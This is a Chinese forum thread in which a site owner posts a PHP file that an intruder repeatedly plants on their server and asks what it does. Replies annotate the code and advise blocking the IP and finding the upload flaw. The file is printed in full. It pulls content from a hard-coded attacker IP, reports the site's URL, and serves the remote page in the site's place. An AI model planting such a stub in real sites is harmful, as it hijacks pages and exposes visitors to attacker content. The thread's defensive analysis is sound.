21,887
社区成员
发帖
与我相关
我的任务
分享PHP代码 请高手帮忙看下什么意思
我网站好像被黑了,总有个SB天天来我网站根目录放一个文件,打开后代码如下:
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://122.114.126.160/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
}
return $html;
}
?>
这什么意图?求高手分析下
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://122.114.126.160/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
}
return $html;
}
?>
这什么意图?求高手分析下
...全文
请发表友善的回复…
发表回复
雨123123 2016-05-06
- 打赏
- 举报
谢谢 有可能
cwk44 2016-04-30
- 打赏
- 举报
我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹
雨123123 2016-04-29
- 打赏
- 举报
-------------------------
感谢
雨123123 2016-04-29
- 打赏
- 举报
-------------------------
感谢
雨123123 2016-04-29
- 打赏
- 举报
-------------------------
感谢
傲雪星枫 2016-04-29
- 打赏
- 举报
把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。
misaka去年夏天 2016-04-29
- 打赏
- 举报
不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。
xuzuning 2016-04-29
- 打赏
- 举报
没有异常?
set_time_limit(0); //永不超时
header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集
$Remote_server = "http://122.114.126.160/"; //远程网站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站
echo $Content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function getHTTPPage($url) { //调用远程网站函数
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
}
return $html;
}
至于对方做了什么?目前尚不清楚
如果是在本地开发环境,返回的是广告,正常的页面没有了
如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(CSRF攻击)
仅是出一点广告,倒是也无所谓
雨123123 2016-04-29
- 打赏
- 举报
谢谢你
雨123123 2016-04-29
- 打赏
- 举报
上面我的描述有问题,这个文件不是放在更目录,是放在根目录的上一个目录,如图:
public_html 这个目录里面是网站的根目录,他这个文件和public_html放在同一个目录,不知道他这样对我的网站有什么影响。 这SB隔天来次,已经删了几次了。
linux系统,目前权限设置为755,设置为644网站就打不开了,有什么办法不让他上次文件吗?
public_html 这个目录里面是网站的根目录,他这个文件和public_html放在同一个目录,不知道他这样对我的网站有什么影响。 这SB隔天来次,已经删了几次了。
linux系统,目前权限设置为755,设置为644网站就打不开了,有什么办法不让他上次文件吗?
山水天元 2016-04-29
- 打赏
- 举报
$Remote_server."/index.html?host=".$host_name 这个地方他把你的网站地址传过去 不知道干什么了 ,代码在那个ip的服务器上面 看不到。。。。。猜不来他要干什么。。。。。
雨123123 2016-04-29
- 打赏
- 举报
我网站没异常(我还没发现异常)
雨123123 2016-04-29
- 打赏
- 举报
我网站没异常(我还没发现异常)
山水天元 2016-04-29
- 打赏
- 举报
好像是他把你网站 原始地址 传到他自己写的一个方法里面 用 host 参数接受 然后抓取你首页的信息吧
山水天元 2016-04-29
- 打赏
- 举报
他把这个代码放到你根目录下,网站是不是访问不了?
